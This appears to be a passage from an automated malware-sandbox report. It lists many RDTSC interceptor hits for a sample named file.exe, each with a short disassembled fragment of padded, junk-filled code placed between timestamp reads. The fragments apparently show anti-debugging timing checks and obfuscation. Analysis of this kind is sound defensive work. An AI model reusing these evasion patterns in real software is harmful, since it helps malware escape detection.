            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4796C9 second address: 4796D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 433239 second address: 433261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 stc 0x00000008 lea eax, dword ptr [ebp+12480FECh] 0x0000000e mov edi, dword ptr [ebp+122D37EEh] 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F2E7D257EBFh 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 433261 second address: 433279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3444h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 433279 second address: 419684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F2E7D257EC9h 0x00000010 nop 0x00000011 jmp 00007F2E7D257EC9h 0x00000016 call dword ptr [ebp+122D2866h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007F2E7D257EC0h 0x00000024 jmp 00007F2E7D257EC5h 0x00000029 pushad 0x0000002a popad 0x0000002b jmp 00007F2E7D257EC4h 0x00000030 popad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 433384 second address: 43338A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 433AAE second address: 433AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 433AB3 second address: 433ABA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 433ABA second address: 433AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], esi 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F2E7D257EB8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 nop 0x00000025 pushad 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 433AE5 second address: 433AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 433E4D second address: 433E53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43425E second address: 434263 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 434263 second address: 4342C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F2E7D257EB8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 pushad 0x00000025 jmp 00007F2E7D257EC8h 0x0000002a or edi, 78427804h 0x00000030 popad 0x00000031 push 0000001Eh 0x00000033 nop 0x00000034 jmp 00007F2E7D257EBDh 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4342C4 second address: 4342C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4342C8 second address: 4342CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 478A1D second address: 478A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 478A27 second address: 478A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 478CC0 second address: 478CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 478CC6 second address: 478CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jne 00007F2E7D257EB6h 0x0000000c pop esi 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 478CD3 second address: 478CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E7D1D343Bh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 478CE2 second address: 478CF8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2E7D257EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F2E7D257EB6h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 478CF8 second address: 478D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3444h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 478D16 second address: 478D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E7D257EC5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 478D31 second address: 478D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 478E8D second address: 478E9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 478E9A second address: 478E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 478E9F second address: 478ED2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2E7D257EB8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnp 00007F2E7D257EB8h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edi 0x00000015 jng 00007F2E7D257EBAh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F2E7D257EC0h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 478ED2 second address: 478ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F9D6 second address: 47F9EC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2E7D257EB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jo 00007F2E7D257EB6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F9EC second address: 47F9F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F2E7D1D3436h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E895 second address: 47E8AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007F2E7D257EDBh 0x0000000d jnp 00007F2E7D257EB8h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EA04 second address: 47EA29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3444h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F2E7D1D3438h 0x0000000f pop edi 0x00000010 pushad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EA29 second address: 47EA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D257EC1h 0x00000009 pop edi 0x0000000a jmp 00007F2E7D257EC5h 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F2E7D257EB6h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EA5C second address: 47EA60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47ED23 second address: 47ED27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47ED27 second address: 47ED2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47ED2D second address: 47ED33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47ED33 second address: 47ED7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2E7D1D3445h 0x0000000c jmp 00007F2E7D1D3442h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F2E7D1D3440h 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47ED7C second address: 47ED87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47ED87 second address: 47ED92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2E7D1D3436h 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47ED92 second address: 47ED99 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EEDE second address: 47EEE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EEE2 second address: 47EEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EEEC second address: 47EEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EEF0 second address: 47EEF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47EEF4 second address: 47EF13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2E7D1D3436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F2E7D1D3447h 0x00000012 jmp 00007F2E7D1D343Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E43A second address: 47E449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D257EBBh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E449 second address: 47E44F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E44F second address: 47E459 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2E7D257EBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47E459 second address: 47E463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F2DA second address: 47F2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47F2E0 second address: 47F2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F2E7D1D3446h 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 482519 second address: 48251D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484ED6 second address: 484EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D3446h 0x00000009 pop esi 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484EF1 second address: 484F10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC7h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485098 second address: 4850A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850A0 second address: 4850C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2E7D257EC8h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850C6 second address: 4850D2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 ja 00007F2E7D1D3436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850D2 second address: 4850D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4853D6 second address: 4853DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4853DC second address: 4853E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4853E2 second address: 4853E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4875F4 second address: 48761F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D257EC5h 0x00000009 jmp 00007F2E7D257EC0h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48761F second address: 487628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487628 second address: 48762E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48762E second address: 487656 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2E7D1D3436h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F2E7D1D3445h 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4877BD second address: 4877D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2E7D257EBDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4877D3 second address: 4877D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B60A second address: 48B610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B610 second address: 48B64E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D3448h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jc 00007F2E7D1D3436h 0x00000010 jns 00007F2E7D1D3436h 0x00000016 pop edi 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F2E7D1D343Eh 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B64E second address: 48B654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B654 second address: 48B665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D1D343Ch 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B665 second address: 48B67A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2E7D257EBAh 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d ja 00007F2E7D257EB6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48AD9C second address: 48ADA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48AFF4 second address: 48B008 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007F2E7D257EB6h 0x00000009 js 00007F2E7D257EB6h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B008 second address: 48B00E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B00E second address: 48B012 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48F83D second address: 48F843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48F843 second address: 48F87C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2E7D257EB6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F2E7D257EC2h 0x00000012 jno 00007F2E7D257EB6h 0x00000018 jns 00007F2E7D257EB6h 0x0000001e jmp 00007F2E7D257EC7h 0x00000023 push eax 0x00000024 push edx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FC93 second address: 48FC99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FC99 second address: 48FC9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FC9D second address: 48FCA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FF6A second address: 48FF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FF73 second address: 48FF77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48FF77 second address: 48FF81 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2E7D257EB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4340B1 second address: 4340CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2E7D1D3444h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4901E6 second address: 4901FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jbe 00007F2E7D257EB6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490BAC second address: 490BE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F2E7D1D3436h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f ja 00007F2E7D1D3436h 0x00000015 pushad 0x00000016 popad 0x00000017 jnl 00007F2E7D1D3436h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F2E7D1D3447h 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 494D01 second address: 494D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 494D05 second address: 494D0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 494D0F second address: 494D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 494D13 second address: 494D3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D1D343Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F2E7D1D3444h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 494D3A second address: 494D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 494D40 second address: 494D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2E7D1D3449h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FB943 second address: 3FB949 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
